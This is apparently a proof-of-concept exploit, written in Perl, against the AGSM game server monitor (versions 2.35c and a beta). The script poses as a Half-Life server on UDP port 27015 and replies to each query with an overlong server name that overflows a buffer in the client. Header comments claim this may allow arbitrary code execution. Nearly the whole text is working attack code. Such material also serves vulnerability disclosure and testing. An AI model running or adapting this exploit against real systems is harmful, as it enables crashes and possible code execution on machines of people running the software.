#Dimetrius's proof of conept agsm buffer overflow xploit...
#
# works with latest release - 2.35c and latest beta...
# Developers provided no sources... i think vuln is in string buffer for half-life server name
# by malforming the server response we can return any string as a servername to agsm
# what will lead to Buffer overflow and possible execution of arbitary code...
#
# v 2.35c (servername lenght is 66 or more bytes to overflow)
# v Latest beta (servername lenght is 148 or more bytes to overflow)
#!/usr/bin/perl
use IO::Socket;

$max = 3024;
$portn = 27015;

$sock = IO::Socket::INET->new(LocalPort => $portn, Proto => 'udp') or die "error: $@\n";
print "Monitoring connections...\n";
while ($sock->recv($query, $max)) {
  my($port, $ipaddr) = sockaddr_in($sock->peername);
  $agsm_ip = inet_ntoa($ipaddr);
  print "$agsm_ip said: $query\n";

  #new version
  $reply2 = "\xff\xff\xff\xffA\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  
  #old (2.35c) version (66 bytes for Hostname string result in overflow
  $reply = "\xff\xff\xff\xffA\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

  $sock->send($reply) or print "damn: $!\n";
}